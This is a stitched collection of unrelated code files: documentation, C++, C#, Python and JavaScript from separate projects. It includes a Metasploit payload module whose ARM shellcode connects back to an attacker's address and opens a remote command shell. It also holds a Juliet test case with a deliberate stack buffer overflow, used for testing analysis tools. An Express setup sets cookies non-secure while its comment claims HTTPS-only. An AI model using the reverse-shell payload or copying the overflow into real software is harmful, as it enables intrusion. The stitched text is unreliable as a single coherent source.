Format a number to a string and have it include or exclude
leading zeros
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`number` | number | Number to format |
`leadingZero` | boolean | True if leading zeros should be included false otherwise |
**Returns:** *string*
Formatted number
___
### parse
▸ **parse**(`parsable`: string, `format`: string): *number*
*Defined in [Format/Minute.ts:26](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format/Minute.ts#L26)*
**`inheritdoc`**
**Parameters:**
Name | Type |
------ | ------ |
`parsable` | string |
`format` | string |
**Returns:** *number*
___
### `Protected` parsePaddedAndUnpaddedUnits
▸ **parsePaddedAndUnpaddedUnits**(`parsable`: string, `format`: string, `token`: string): *number*
*Inherited from [Year](_format_year_.year.md).[parsePaddedAndUnpaddedUnits](_format_year_.year.md#protected-parsepaddedandunpaddedunits)*
*Defined in [Format.ts:43](https://github.com/TerenceJefferies/STime/blob/b69ea6e/src/Format.ts#L43)*
**Parameters:**
Name | Type | Description |
------ | ------ | ------ |
`parsable` | string | - |
`format` | string | - |
`token` | string | |
**Returns:** *number*
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33.cpp
Label Definition File: CWE121_Stack_Based_Buffer_Overflow__CWE805.string.label.xml
Template File: sources-sink-33.tmpl.cpp
*/
/*
* @description
* CWE: 121 Stack Based Buffer Overflow
* BadSource: Set data pointer to the bad buffer
* GoodSource: Set data pointer to the good buffer
* Sinks: loop
* BadSink : Copy string to data using a loop
* Flow Variant: 33 Data flow: use of a C++ reference to data within the same function
*
* */
#include "std_testcase.h"
#include <wchar.h>
namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33
{
#ifndef OMITBAD
void bad()
{
wchar_t * data;
wchar_t * &dataRef = data;
wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
/* FLAW: Set a pointer to a "small" buffer. This buffer will be used in the sinks as a destination
* buffer in various memory copying functions using a "large" source buffer. */
data = dataBadBuffer;
data[0] = L'\0'; /* null terminate */
{
wchar_t * data = dataRef;
{
size_t i;
wchar_t source[100];
wmemset(source, L'C', 100-1); /* fill with L'C's */
source[100-1] = L'\0'; /* null terminate */
/* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
for (i = 0; i < 100; i++)
{
data[i] = source[i];
}
data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
printWLine(data);
}
}
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodG2B() uses the GoodSource with the BadSink */
static void goodG2B()
{
wchar_t * data;
wchar_t * &dataRef = data;
wchar_t * dataBadBuffer = (wchar_t *)ALLOCA(50*sizeof(wchar_t));
wchar_t * dataGoodBuffer = (wchar_t *)ALLOCA(100*sizeof(wchar_t));
/* FIX: Set a pointer to a "large" buffer, thus avoiding buffer overflows in the sinks. */
data = dataGoodBuffer;
data[0] = L'\0'; /* null terminate */
{
wchar_t * data = dataRef;
{
size_t i;
wchar_t source[100];
wmemset(source, L'C', 100-1); /* fill with L'C's */
source[100-1] = L'\0'; /* null terminate */
/* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */
for (i = 0; i < 100; i++)
{
data[i] = source[i];
}
data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */
printWLine(data);
}
}
}
void good()
{
goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE121_Stack_Based_Buffer_Overflow__CWE805_wchar_t_alloca_loop_33; /* so that we can use good and bad easily */
int main(int argc, char * argv[])
{
/* seed randomness */
srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
printLine("Calling good()...");
good();
printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
printLine("Calling bad()...");
bad();
printLine("Finished bad()");
#endif /* OMITBAD */
return 0;
}
#endif
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.34011
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace SerialLabs.Data.AzureTable.Properties
{
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources() {
}
/// <summary>
/// Returns the cached ResourceManager instance used by this class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SerialLabs.Data.AzureTable.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// Overrides the current thread's CurrentUICulture property for all
/// resource lookups using this strongly typed resource class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set {
resourceCulture = value;
}
}
/// <summary>
/// Looks up a localized string similar to Unable to cast type '{0}' to target type '{1}'..
/// </summary>
internal static string ExpressionEvaluatorInvalidCast {
get {
return ResourceManager.GetString("ExpressionEvaluatorInvalidCast", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Type '{0}' is not supported..
/// </summary>
internal static string ExpressionEvaluatorTypeNotSupported {
get {
return ResourceManager.GetString("ExpressionEvaluatorTypeNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to get value of the node: '{0}'..
/// </summary>
internal static string ExpressionEvaluatorUnableToEvaluate {
get {
return ResourceManager.GetString("ExpressionEvaluatorUnableToEvaluate", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to serialize type: '{0}'..
/// </summary>
internal static string SerializationExtensionsNotSupportedType {
get {
return ResourceManager.GetString("SerializationExtensionsNotSupportedType", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Member '{0}' does not supported..
/// </summary>
internal static string TranslatorMemberNotSupported {
get {
return ResourceManager.GetString("TranslatorMemberNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Invalid method '{0}' arguments..
/// </summary>
internal static string TranslatorMethodInvalidArgument {
get {
return ResourceManager.GetString("TranslatorMethodInvalidArgument", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Method '{0}' does not supported..
/// </summary>
internal static string TranslatorMethodNotSupported {
get {
return ResourceManager.GetString("TranslatorMethodNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Operator '{0}' does not supported..
/// </summary>
internal static string TranslatorOperatorNotSupported {
get {
return ResourceManager.GetString("TranslatorOperatorNotSupported", resourceCulture);
}
}
/// <summary>
/// Looks up a localized string similar to Unable to evaluate an expression: '{0}'..
/// </summary>
internal static string TranslatorUnableToEvaluateExpression {
get {
return ResourceManager.GetString("TranslatorUnableToEvaluateExpression", resourceCulture);
}
}
}
}
|
/**
@file appmodule.cpp
@brief This file is part of Kalinka mediaserver.
@author Ivan Murashko <[email protected]>
Copyright (c) 2007-2012 Kalinka Team
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CHANGE HISTORY
@date
- 2009/04/02 created by ipp (Ivan Murashko)
- 2009/08/02 header was changed by header.py script
- 2010/01/06 header was changed by header.py script
- 2011/01/01 header was changed by header.py script
- 2012/02/03 header was changed by header.py script
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "appmodule.h"
#include "exception.h"
#include "cliapp.h"
#include "db.h"
using namespace klk::app;
//
// Module class
//
// Constructor
Module::Module(klk::IFactory* factory,
const std::string& modid,
const std::string& setmsgid,
const std::string& showmsgid) :
klk::ModuleWithDB(factory, modid), m_appuuid_mutex(), m_appuuid(),
m_setmsgid(setmsgid),
m_showmsgid(showmsgid)
{
BOOST_ASSERT(m_setmsgid.empty() == false);
BOOST_ASSERT(m_showmsgid.empty() == false);
BOOST_ASSERT(m_setmsgid != m_showmsgid);
}
// Retrives application uuid
const std::string Module::getAppUUID()
{
using namespace klk;
Locker lock(&m_appuuid_mutex);
if (m_appuuid.empty())
{
// retrive application id
// `klk_application_uuid_get` (
// IN module VARCHAR(40),
// IN host VARCHAR(40),
// OUT application VARCHAR(40)
db::DB db(getFactory());
db.connect();
db::Parameters params;
params.add("@module", getID());
params.add("@host", db.getHostUUID());
params.add("@application");
db::Result res = db.callSimple("klk_application_uuid_get", params);
if (res["@application"].isNull())
{
throw Exception(__FILE__, __LINE__,
"DB error while retriving application uuid");
}
m_appuuid = res["@application"].toString();
}
return m_appuuid;
}
// Register all processors
void Module::registerProcessors()
{
using namespace klk;
ModuleWithDB::registerProcessors();
registerCLI(cli::ICommandPtr(new cli::AutostartSet(m_setmsgid)));
registerCLI(cli::ICommandPtr(new cli::AutostartShow(m_showmsgid)));
}
|
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'civ',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 172, 'ADDR' ],
'LPORT' => [ 170, 'n' ],
},
'Payload' =>
[
#### Tested successfully on:
# Linux 2.6.29.6-cm42 armv6l
# Linux 2.6.29.6-cyanogenmod armv6l
# Linux version 2.6.25-00350-g40fff9a armv5l
# Linux version 2.6.27-00110-g132305e armv5l
# Linux version 2.6.29-00177-g24ee4d2 armv5l
# Linux version 2.6.29-00255-g7ca5167 armv5l
#
# Probably requires process to have INTERNET permission
# or root.
####
# socket(2,1,6)
0xe3a00002, # mov r0, #2 ; 0x2
0xe3a01001, # mov r1, #1 ; 0x1
0xe2812005, # add r2, r1, #5 ; 0x5
0xe3a0708c, # mov r7, #140 ; 0x8c
0xe287708d, # add r7, r7, #141 ; 0x8d
0xef000000, # svc 0x00000000
# connect(soc, socaddr, 0x10)
0xe1a06000, # mov r6, r0
0xe28f1084, # 1dr r1, pc, #132 ; 0x84
0xe3a02010, # mov r2, #16 ; 0x10
0xe3a0708d, # mov r7, #141 ; 0x8d
0xe287708e, # add r7, r7, #142 ; 0x8e
0xef000000, # svc 0x00000000
# dup2(soc,0) @stdin
0xe1a00006, # mov r0, r6
0xe3a01000, # mov r1, #0 ; 0x0
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# dup2(soc,1) @stdout
0xe1a00006, # mov r0, r6
0xe3a01001, # mov r1, #1 ; 0x1
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# dup2(soc,2) @stderr
0xe1a00006, # mov r0, r6
0xe3a01002, # mov r1, #2 ; 0x2
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
# execve("/system/bin/sh", args, env)
# Shrink me here. I am lame.
0xe28f0048, # add r0, pc, #72 ; 0x48
0xe0244004, # eor r4, r4, r4
0xe92d0010, # push {r4}
0xe1a0200d, # mov r2, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe92d0010, # push {r4}
0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0x8>
0xe92d0002, # push {r1}
0xe92d2000, # push {sp}
0xe1a0100d, # mov r1, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe3a0700b, # mov r7, #11 ; 0xb
0xef000000, # svc 0x00000000
# exit(0)
0xe3a00000, # mov r0, #0 ; 0x0
0xe3a07001, # mov r7, #1 ; 0x1
0xef000000, # svc 0x00000000
# <af>:
# port offset = 170, ip offset = 172
0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
# <shell>:
0x00000000, # .word 0x00000000 ; the shell goes here!
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
# <arg>:
0x00000000 # .word 0x00000000 ; the args!
].pack("V*")
}
))
# Register command execution options
register_options(
[
OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
if sh.length >= 16
raise ArgumentError, "The specified shell must be less than 16 bytes."
end
p[176, sh.length] = sh
arg = datastore['SHELLARG']
if arg
if arg.length >= 4
raise ArgumentError, "The specified shell argument must be less than 4 bytes."
end
p[192, arg.length] = arg
end
p
end
end
|
/**
* Copyright (c) 2019 Horizon Robotics. All rights reserved.
* @File: LmkPosePostPredictor.cpp
* @Brief: definition of the LmkPosePostPredictor
* @Author: zhengzheng.ge
* @Email: [email protected]
* @Date: 2019-07-17 14:27:05
* @Last Modified by: zhengzheng.ge
* @Last Modified time: 2019-07-17 15:18:10
*/
#include "CNNMethod/PostPredictor/LmkPosePostPredictor.h"
#include <vector>
#include "CNNMethod/CNNConst.h"
#include "CNNMethod/util/util.h"
#include "hobotlog/hobotlog.hpp"
#include "hobotxstream/profiler.h"
namespace xstream {
void LmkPosePostPredictor::Do(CNNMethodRunData *run_data) {
int batch_size = run_data->input_dim_size.size();
run_data->output.resize(batch_size);
for (int batch_idx = 0; batch_idx < batch_size; batch_idx++) {
int dim_size = run_data->input_dim_size[batch_idx];
auto &mxnet_output = run_data->mxnet_output[batch_idx];
std::vector<BaseDataPtr> &batch_output = run_data->output[batch_idx];
batch_output.resize(output_slot_size_);
for (int i = 0; i < output_slot_size_; i++) {
auto base_data_vector = std::make_shared<BaseDataVector>();
batch_output[i] = std::static_pointer_cast<BaseData>(base_data_vector);
}
{
RUN_PROCESS_TIME_PROFILER(model_name_ + "_post");
RUN_FPS_PROFILER(model_name_ + "_post");
auto boxes = std::static_pointer_cast<BaseDataVector>(
(*(run_data->input))[batch_idx][0]);
for (int dim_idx = 0; dim_idx < dim_size; dim_idx++) {
std::vector<BaseDataPtr> output;
auto xstream_box = std::static_pointer_cast<XStreamData<
hobot::vision::BBox>>(boxes->datas_[dim_idx]);
HandleLmkPose(mxnet_output[dim_idx], xstream_box->value,
run_data->real_nhwc, &output);
for (int i = 0; i < output_slot_size_; i++) {
auto base_data_vector =
std::static_pointer_cast<BaseDataVector>(batch_output[i]);
base_data_vector->datas_.push_back(output[i]);
}
}
}
}
}
void LmkPosePostPredictor::HandleLmkPose(
const std::vector<std::vector<int8_t>> &mxnet_outs,
const hobot::vision::BBox &box,
const std::vector<std::vector<uint32_t>> &nhwc,
std::vector<BaseDataPtr> *output) {
if (mxnet_outs.size()) {
auto lmk = LmkPostPro(mxnet_outs, box, nhwc);
output->push_back(lmk);
if (mxnet_outs.size() > 3) {
auto pose = PosePostPro(mxnet_outs[3]);
output->push_back(pose);
} else {
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
pose->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(pose));
}
} else {
auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
landmarks->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(landmarks));
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
pose->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(pose));
}
}
BaseDataPtr LmkPosePostPredictor::LmkPostPro(
const std::vector<std::vector<int8_t>> &mxnet_outs,
const hobot::vision::BBox &box,
const std::vector<std::vector<uint32_t>> &nhwc) {
static const float SCORE_THRESH = 0.0;
static const float REGRESSION_RADIUS = 3.0;
static const float STRIDE = 4.0;
static const float num = 1;
static const float height_m = 16;
static const float width_m = 16;
auto fl_scores = reinterpret_cast<const float *>(mxnet_outs[0].data());
auto fl_coords = reinterpret_cast<const float *>(mxnet_outs[1].data());
std::vector<std::vector<float>> points_score;
std::vector<std::vector<float>> points_x;
std::vector<std::vector<float>> points_y;
points_score.resize(5);
points_x.resize(5);
points_y.resize(5);
// nhwc, 1x16x16x5, 1x16x16x10
for (int n = 0; n < num; ++n) { // n
for (int i = 0; i < height_m; ++i) { // h
for (int j = 0; j < width_m; ++j) { // w
int index_score = n * nhwc[0][1] * nhwc[0][2] * nhwc[0][3] +
i * nhwc[0][2] * nhwc[0][3] + j * nhwc[0][3];
int index_coords = n * nhwc[1][1] * nhwc[1][2] * nhwc[0][3] +
i * nhwc[1][2] * nhwc[1][3] + j * nhwc[1][3];
for (int k = 0; k < 5; ++k) { // c
auto score = fl_scores[index_score + k];
if (score > SCORE_THRESH) {
points_score[k].push_back(score);
float x = (j + 0.5 -
fl_coords[index_coords + 2 * k] * REGRESSION_RADIUS) *
STRIDE;
float y =
(i + 0.5 -
fl_coords[index_coords + 2 * k + 1] * REGRESSION_RADIUS) *
STRIDE;
x = std::min(std::max(x, 0.0f), width_m * STRIDE);
y = std::min(std::max(y, 0.0f), height_m * STRIDE);
points_x[k].push_back(x);
points_y[k].push_back(y);
}
}
}
}
}
auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
landmarks->value.values.resize(5);
for (int i = 0; i < 5; ++i) {
auto &poi = landmarks->value.values[i];
poi.x = Mean(points_x[i]);
poi.y = Mean(points_y[i]);
poi.x = box.x1 + poi.x / 64 * (box.x2 - box.x1);
poi.y = box.y1 + poi.y / 64 * (box.y2 - box.y1);
poi.score = static_cast<float>(points_score[i].size());
if (poi.score <= 0.000001 && mxnet_outs.size() > 2) {
auto reg_coords = reinterpret_cast<const float *>(mxnet_outs[2].data());
poi.x = box.x1 + reg_coords[i << 1] * (box.x2 - box.x1);
poi.y = box.y1 + reg_coords[(i << 1) + 1] * (box.y2 - box.y1);
}
}
return std::static_pointer_cast<BaseData>(landmarks);
}
BaseDataPtr LmkPosePostPredictor::PosePostPro(
const std::vector<int8_t> &mxnet_outs) {
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
auto mxnet_out = reinterpret_cast<const float *>(mxnet_outs.data());
pose->value.yaw = mxnet_out[0] * 90.0;
pose->value.pitch = mxnet_out[1] * 90.0;
pose->value.roll = mxnet_out[2] * 90.0;
return std::static_pointer_cast<BaseData>(pose);
}
} // namespace xstream
|
# coding=utf-8
# Copyright (c) 2020 NVIDIA CORPORATION. All rights reserved.
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file has been copied from
# https://github.com/mlcommons/inference/blob/r0.7/vision/medical_imaging/3d-unet/preprocess.py
import argparse
import numpy
import os
import pickle
import sys
import torch
from batchgenerators.augmentations.utils import pad_nd_image
from batchgenerators.utilities.file_and_folder_operations import subfiles
from nnunet.training.model_restore import load_model_and_checkpoint_files
from nnunet.inference.predict import preprocess_multithreaded
def preprocess_MLPerf(model, checkpoint_name, folds, fp16, list_of_lists, output_filenames, preprocessing_folder, num_threads_preprocessing):
assert len(list_of_lists) == len(output_filenames)
print("loading parameters for folds", folds)
trainer, params = load_model_and_checkpoint_files(model, folds, fp16, checkpoint_name=checkpoint_name)
print("starting preprocessing generator")
preprocessing = preprocess_multithreaded(trainer, list_of_lists, output_filenames, num_threads_preprocessing, None)
print("Preprocessing images...")
all_output_files = []
for preprocessed in preprocessing:
output_filename, (d, dct) = preprocessed
all_output_files.append(output_filename)
if isinstance(d, str):
data = np.load(d)
os.remove(d)
d = data
# Pad to the desired full volume
d = pad_nd_image(d, trainer.patch_size, "constant", None, False, None)
with open(os.path.join(preprocessing_folder, output_filename+ ".pkl"), "wb") as f:
pickle.dump([d, dct], f)
f.close()
return all_output_files
def preprocess_setup(preprocessed_data_dir):
print("Preparing for preprocessing data...")
# Validation set is fold 1
fold = 1
validation_fold_file = '../models/image_segmentation/tensorflow/3d_unet_mlperf/inference/nnUNet/folds/fold1_validation.txt'
# Make sure the model exists
model_dir = 'build/result/nnUNet/3d_fullres/Task043_BraTS2019/nnUNetTrainerV2__nnUNetPlansv2.mlperf.1'
model_path = os.path.join(model_dir, "plans.pkl")
assert os.path.isfile(model_path), "Cannot find the model file {:}!".format(model_path)
checkpoint_name = "model_final_checkpoint"
# Other settings
fp16 = False
num_threads_preprocessing = 12
raw_data_dir = 'build/raw_data/nnUNet_raw_data/Task043_BraTS2019/imagesTr'
# Open list containing validation images from specific fold (e.g. 1)
validation_files = []
with open(validation_fold_file) as f:
for line in f:
validation_files.append(line.rstrip())
# Create output and preprocessed directory
if not os.path.isdir(preprocessed_data_dir):
os.makedirs(preprocessed_data_dir)
# Create list of images locations (i.e. 4 images per case => 4 modalities)
all_files = subfiles(raw_data_dir, suffix=".nii.gz", join=False, sort=True)
list_of_lists = [[os.path.join(raw_data_dir, i) for i in all_files if i[:len(j)].startswith(j) and
len(i) == (len(j) + 12)] for j in validation_files]
# Preprocess images, returns filenames list
# This runs in multiprocess
print("Acually preprocessing data...")
preprocessed_files = preprocess_MLPerf(model_dir, checkpoint_name, fold, fp16, list_of_lists,
validation_files, preprocessed_data_dir, num_threads_preprocessing)
print("Saving metadata of the preprocessed data...")
with open(os.path.join(preprocessed_data_dir, "preprocessed_files.pkl"), "wb") as f:
pickle.dump(preprocessed_files, f)
print("Preprocessed data saved to {:}".format(preprocessed_data_dir))
print("Done!")
|
"""Get example scripts, notebooks, and data files."""
import argparse
from datetime import datetime, timedelta
from glob import glob
import json
import os
import pkg_resources
from progressbar import ProgressBar
try:
# For Python 3.0 and later
from urllib.request import urlopen
except ImportError:
# Fall back to Python 2's urllib2
from urllib2 import urlopen
import shutil
import sys
example_data_files = (
["MovingEddies_data/" + fn for fn in [
"moving_eddiesP.nc", "moving_eddiesU.nc", "moving_eddiesV.nc"]]
+ ["OFAM_example_data/" + fn for fn in [
"OFAM_simple_U.nc", "OFAM_simple_V.nc"]]
+ ["Peninsula_data/" + fn for fn in [
"peninsulaU.nc", "peninsulaV.nc", "peninsulaP.nc"]]
+ ["GlobCurrent_example_data/" + fn for fn in [
"%s000000-GLOBCURRENT-L4-CUReul_hs-ALT_SUM-v02.0-fv01.0.nc" % (
date.strftime("%Y%m%d"))
for date in ([datetime(2002, 1, 1) + timedelta(days=x)
for x in range(0, 365)] + [datetime(2003, 1, 1)])]]
+ ["DecayingMovingEddy_data/" + fn for fn in [
"decaying_moving_eddyU.nc", "decaying_moving_eddyV.nc"]]
+ ["NemoCurvilinear_data/" + fn for fn in [
"U_purely_zonal-ORCA025_grid_U.nc4", "V_purely_zonal-ORCA025_grid_V.nc4",
"mesh_mask.nc4"]]
+ ["NemoNorthSeaORCA025-N006_data/" + fn for fn in [
"ORCA025-N06_20000104d05U.nc", "ORCA025-N06_20000109d05U.nc",
"ORCA025-N06_20000104d05V.nc", "ORCA025-N06_20000109d05V.nc",
"ORCA025-N06_20000104d05W.nc", "ORCA025-N06_20000109d05W.nc",
"coordinates.nc"]])
example_data_url = "http://oceanparcels.org/examples-data"
def _maybe_create_dir(path):
"""Create directory (and parents) if they don't exist."""
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def copy_data_and_examples_from_package_to(target_path):
"""Copy example data from Parcels directory.
Return thos parths of the list `file_names` that were not found in the
package.
"""
examples_in_package = pkg_resources.resource_filename("parcels", "examples")
try:
shutil.copytree(examples_in_package, target_path)
except Exception as e:
print(e)
pass
def set_jupyter_kernel_to_python_version(path, python_version=2):
"""Set notebook kernelspec to desired python version.
This also drops all other meta data from the notebook.
"""
for file_name in glob(os.path.join(path, "*.ipynb")):
with open(file_name, 'r') as f:
notebook_data = json.load(f)
notebook_data['metadata'] = {"kernelspec": {
"display_name": "Python {}".format(python_version),
"language": "python",
"name": "python{}".format(python_version)}}
with open(file_name, 'w') as f:
json.dump(notebook_data, f, indent=2)
def _still_to_download(file_names, target_path):
"""Only return the files that are not yet present on disk."""
for fn in list(file_names):
if os.path.exists(os.path.join(target_path, fn)):
file_names.remove(fn)
return file_names
def download_files(source_url, file_names, target_path):
"""Mirror file_names from source_url to target_path."""
_maybe_create_dir(target_path)
pbar = ProgressBar()
print("Downloading %s ..." % (source_url.split("/")[-1]))
for filename in pbar(file_names):
_maybe_create_dir(os.path.join(target_path, os.path.dirname(filename)))
if not os.path.exists(os.path.join(target_path, filename)):
download_url = source_url + "/" + filename
src = urlopen(download_url)
with open(os.path.join(target_path, filename), 'wb') as dst:
dst.write(src.read())
def main(target_path=None):
"""Get example scripts, example notebooks, and example data.
Copy the examples from the package directory and get the example data either
from the package directory or from the Parcels website.
"""
if target_path is None:
# get targe directory
parser = argparse.ArgumentParser(
description="Get Parcels example data.")
parser.add_argument(
"target_path",
help="Where to put the tutorials? (This path will be created.)")
args = parser.parse_args()
target_path = args.target_path
if os.path.exists(target_path):
print("Error: {} already exists.".format(target_path))
return
# copy data and examples
copy_data_and_examples_from_package_to(target_path)
# make sure the notebooks use the correct python version
set_jupyter_kernel_to_python_version(
target_path,
python_version=sys.version_info[0])
# try downloading remaining files
remaining_example_data_files = _still_to_download(
example_data_files, target_path)
download_files(example_data_url, remaining_example_data_files, target_path)
if __name__ == "__main__":
main()
|
const express = require('express');
const cors = require('cors');
const bodyParser = require('body-parser');
const session = require('express-session');
const MYSQLStore = require('express-session-sequelize')(session.Store);
const next = require('next');
const compression = require('compression');
const helmet = require('helmet');
// const Sequelize = require('sequelize');
const logger = require('./logger');
const { insertTemplates } = require('./models/EmailTemplate');
const getRootUrl = require('../lib/api/getRootUrl');
// const User = require('./models/User');
const { initMigrateData } = require('./models/Group');
const { newMysqlInstance } = require('./utils/utils');
const setupGoogle = require('./google');
const fileSystem = require('./filesystem');
const api = require('./api');
require('dotenv').config();
const dev = process.env.NODE_ENV !== 'production';
// const MONGO_URL = process.env.MONGO_URL_TEST;
// const options = {
// useNewUrlParser: true,
// useCreateIndex: true,
// useFindAndModify: false,
// useUnifiedTopology: true,
// };
const port = process.env.PORT || 8000;
const ROOT_URL = getRootUrl();
const URL_MAP = {
'/login': '/public/login',
'/contact': '/public/contact',
};
const app = next({ dev });
const handle = app.getRequestHandler();
const myDatabase = newMysqlInstance();
// const myDatabase = new Sequelize(process.env.MYSQL_DATABASE, process.env.MYSQL_USER, process.env.MYSQL_PASSWORD, {
// host: process.env.MYSQL_SERVER,
// dialect: 'mysql',
// });
// Nextjs's server prepared
app.prepare().then(async () => {
// await tf.setBackend('cpu');
const server = express();
server.use(helmet({ contentSecurityPolicy: false }));
server.use(compression());
if (process.env.REQUIRE_INIT_GROUP === 'true') {
console.log('Starting initiate Group Data');
try {
await initMigrateData();
console.log('Initiate Group Data Done.');
} catch (err) {
console.error('Init Group error:', err);
}
}
// confuring mysql session store
const sess = {
name: process.env.SESSION_NAME,
secret: process.env.SESSION_SECRET,
store: new MYSQLStore({ db: myDatabase }),
resave: false,
saveUninitialized: false,
cookie: {
httpOnly: true,
maxAge: 14 * 24 * 60 * 60 * 1000,
domain: process.env.COOKIE_DOMAIN,
},
};
if (!dev) {
server.set('trust proxy', 1); // sets req.hostname, req.ip
sess.cookie.secure = false; // sets cookie over HTTPS only
}
server.use(session(sess));
await insertTemplates();
server.use(cors());
